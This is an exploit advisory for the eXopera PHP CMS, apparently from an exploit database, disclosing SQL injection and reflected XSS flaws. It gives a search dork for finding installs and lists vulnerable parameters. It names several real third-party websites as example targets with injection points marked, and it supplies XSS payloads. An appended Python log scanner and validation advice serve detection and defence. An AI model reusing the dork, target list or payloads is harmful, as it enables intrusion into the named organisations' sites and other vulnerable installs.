
eXopera Sql Injection/XSS Vulnerabilities

Author: AtT4CKxT3rR0r1ST
Risk: Security Risk Critical
0day-ID: 0day-ID-18711
Category: web applications
Date added: 20-06-2012
Platform: php

eXopera Sql Injection/XSS Vulnerabilities
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.exopera.be/
.:. Dork           : "Powered by eXopera"
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/product.php?prodid=sql
http://SITE/dyntxt.php?catno=20&itemno=sql
http://SITE/item.php?itemno=sql
http://SITE/faq.php?catid=sql

Example:

http://www.erfgoedcelsinttruiden.be/product.php?prodid=137[sql]
http://www.erfgoedcelkortrijk.be/product.php?prodid=316[sql]
http://erfgoedcelbrussel.be/product.php?prodid=368[sql]
http://www.erfgoedcelkempenskarakter.be/product.php?prodid=207[sql]
http://www.vandeputtetextiles.eu/dyntxt.php?catno=20&itemno=25[sql]
http://www.erfgoedcelsinttruiden.be/item.php?itemno=1[sql]
http://www.erfgoedcelsinttruiden.be/faq.php?catid=1

More In Google....



Multiple Reflected XSS
=======================

http://SITE/item.php?lang='"--></style></script><script>alert(1337)</script>
http://SITE/faq.php?catid=16&lang='"--></style></script><script>alert(1337)</script>
http://SITE/item.php?itemno='"--></style></script><script>alert(1337)</script>

####################################################################### 
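
A defender-side check for the parameters listed above, as an added example that is not part of the original advisory or of eXopera: it screens access-log lines for requests to the four scripts whose id parameters are not plain integers or whose lang value is not a short language code. The expected value formats, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory. That the id parameters are
# integers and lang is a short language code is an assumption about eXopera.
NUMERIC_PARAMS = {
    "product.php": {"prodid"},
    "dyntxt.php": {"catno", "itemno"},
    "item.php": {"itemno"},
    "faq.php": {"catid"},
}
LANG_SCRIPTS = {"item.php", "faq.php"}
INT_RE = re.compile(r"\d{1,10}")
LANG_RE = re.compile(r"[A-Za-z]{2}(?:[-_][A-Za-z]{2})?")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_url(url):
    """Return (param, decoded value) pairs that fail the allow-list."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]  # tolerate installs in a subdirectory
    findings = []
    # parse_qsl percent-decodes, so encoded quotes and tags are seen in clear
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in NUMERIC_PARAMS.get(script, ()):
            if not INT_RE.fullmatch(value):
                findings.append((name, value))
        elif name == "lang" and script in LANG_SCRIPTS:
            if not LANG_RE.fullmatch(value):
                findings.append((name, value))
    return findings

def scan_log(lines):
    """Yield (line number, request target, findings) for rejected requests."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (findings := check_url(m.group(1))):
            yield n, m.group(1), findings

# Constructed sample lines in combined log format (documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jun/2012:10:00:01 +0200] "GET /product.php?prodid=137 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [20/Jun/2012:10:00:05 +0200] "GET /product.php?prodid=137%27 HTTP/1.1" 200 312',
    '192.0.2.11 - - [20/Jun/2012:10:00:09 +0200] "GET /faq.php?catid=16&lang=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4096',
    '192.0.2.12 - - [20/Jun/2012:10:00:12 +0200] "GET /item.php?itemno=1&lang=nl HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: {target} -> {findings}")
```

The same allow-list, applied server-side before the values reach a query or the page output, is the corresponding input-validation control; it complements parameterized queries and output encoding rather than replacing them.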


